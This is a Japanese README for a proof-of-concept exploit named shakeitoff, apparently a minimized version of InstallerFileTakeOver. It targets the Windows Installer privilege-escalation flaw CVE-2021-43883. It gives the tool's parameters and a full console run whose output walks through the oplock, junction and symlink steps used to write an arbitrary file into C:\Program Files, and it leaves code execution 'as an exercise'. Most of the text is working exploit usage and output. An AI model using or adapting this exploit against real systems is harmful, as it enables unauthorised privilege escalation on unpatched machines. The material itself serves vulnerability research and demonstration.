
InstallerFileTakeOverの、より小さく、最小化され、クリーンなバージョンです。CVE-2021-41379の「バリエーション」とされるゼロデイエクスプロイト(後にCVE-2021-43883が割り当てられました)です。このバージョンはInstallerFileTakeOverのようにシェルを起動しません。このコードの目的は、ファイル作成攻撃をより確実に実証するための、よりシンプルな概念実証を作成することです。この概念実証は、ユーザーが要求した任意のファイルを作成し(書き込み可能性を証明するために自身をそのファイルにコピーします)。コード実行の実証は読者への簡単な課題として残されています。
攻撃の仕組みを理解するには、AttackerKBの解説を参照してください。
このツールには3つのパラメータが必要です:
C:\Users\albinolobster\source\repos\shakeitoff\x64\Release>.\shakeitoff.exe
option "msi_path" is required
Allowed options:
-h, --help produce help message
-m, --msi_path arg The path to the MSI to install
-i, --install_path arg The path to install to
-p, --target_path arg The file to create
-m - インストールするMSI(フルパスが必要です)。このリポジトリに1つ用意されています(ファイルパスが実際に重要なので、それを使用してください)。-i - インストール先のパス(フルパスが必要です)。MSIがインストールされる場所、つまりエクスプロイトが実行される場所です。ユーザーは事前にこれを指定する必要があり、空のディレクトリでなければなりません。ツールはこのディレクトリをクリーンアップしません(バグの調査を容易にするためです)。また、末尾に\が必要です(私がモンスターだからです)。-p - 上書き/作成するファイル。フルパスが必要です。PoCは自身をターゲットファイルにコピーするだけです。
C:\Users\Public>dir "C:\Program Files\lol"
Volume in drive C has no label.
Volume Serial Number is 5E1E-AC13
Directory of C:\Program Files
File Not Found
C:\Users\Public>.\shakeitoff.exe -m C:\Users\Public\shakeitoff.msi -i C:\Users\Public\lol\ -p "C:\Program Files\lol"
[+] User provided MSI path: C:\Users\Public\shakeitoff.msi
[+] The target path is: C:\Program Files\lol
[+] Create the temp directory structure we'll install into
[+] Grabbing handle to lock C:\Users\Public\lol\shakeitoff\haters.jpg
[+] Grabbing a directory handle of C:\Users\Public\lol\shakeitoff\
[+] Monitor shakeitoff\shakeitoff for an rbf file
[+] MSI install: ACTION=ADMIN REBOOT=ReallySuppress TARGETDIR=C:\Users\Public\lol\ C:\Users\Public\shakeitoff.msi
[+] Grabbing a handle to inner shakeitoff directory
[+] In callback for oplock one
[+] Opening handle to C:\Users\Public\lol\shakeitoff\8da858.rbf
[+] Creating the callback directory at C:\Users\Public\lol\cb_directory
[+] Grab a handle for the callback directry
[+] Creating a junction from C:\Users\Public\lol\cb_directory to \BaseNamedObjects\Restricted
[+] Inside callback two
[+] Release the hater.jpg handle to unlock
[+] Move the rbf file to C:\Users\Public\lol\weird_directory
[+] Move inner shakeitoff to C:\Users\Public\lol\weird_directory
[+] Move junction at C:\Users\Public\lol\cb_directory to C:\Users\Public\lol\shakeitoff
[+] Configuring symlink from \BaseNamedObjects\Restricted\8da858.rbf to \??\C:\Program Files\lol
[+] symlink created!
[+] MsiInstallProductA return value: 1603
[+] Exploit thread joined
[+] Copy into target!
C:\Users\Public>dir "C:\Program Files\lol"
Volume in drive C has no label.
Volume Serial Number is 5E1E-AC13
Directory of C:\Program Files
12/02/2021 02:01 PM 368,640 lol
1 File(s) 368,640 bytes
0 Dir(s) 86,015,610,880 bytes free
FileOpLockコードは、angrypolarbearbug2から取り出した(わずかに修正した)バージョンです。